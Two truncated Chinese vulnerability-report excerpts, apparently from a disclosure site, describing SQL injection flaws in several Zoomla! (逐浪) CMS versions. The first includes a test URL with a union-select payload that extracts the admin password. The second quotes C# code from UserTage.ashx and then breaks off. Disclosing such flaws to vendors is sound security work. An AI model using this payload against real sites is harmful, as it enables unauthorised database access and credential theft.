逐浪CMS一个文件夹9款注入姿势影响版本cms4.1 CMS2_x1.5 CMS6.0 CMS2_x1.4正式版

简要描述： 影响版本Zoomla!cms4.1源码Zoomla!CMS2x1.5源码 Zoomla!CMS6.0 Zoomla!逐浪CMS2x1.4正式版 此文件夹注入点蛮多的 厂商需努力呀 详细说明： 文件目录3D 注入1 文件/3D/1sMail.aspx 问题阐述 ShopID 测试： http://192.168.10.19:9992/3d/sMail.aspx?ShopID=1000000 union// all select// 1,2,'3','4','5','6','7','8','9',STUFFadminPassword , 1, 0,...

逐浪CMS任意SQL游走CMS2 V1.4 V1.5、 CMS6.0均受影响（其他版本死链未测）

简要描述： 问题出现在详细说明中 详细说明： 问题出现在 User\Develop\ashx\UserTage.ashx 代码片段： try MZoneNode MZN = new MZoneNode; BEditPage BEP = new BEditPage; MZN.NodeID = Convert.ToInt32nodeid; MZN.UserID = BU.GetLogin.UserID; string strTemp = style; string strStyle = strTemp.Split'|'; if strStyle != null foreach string...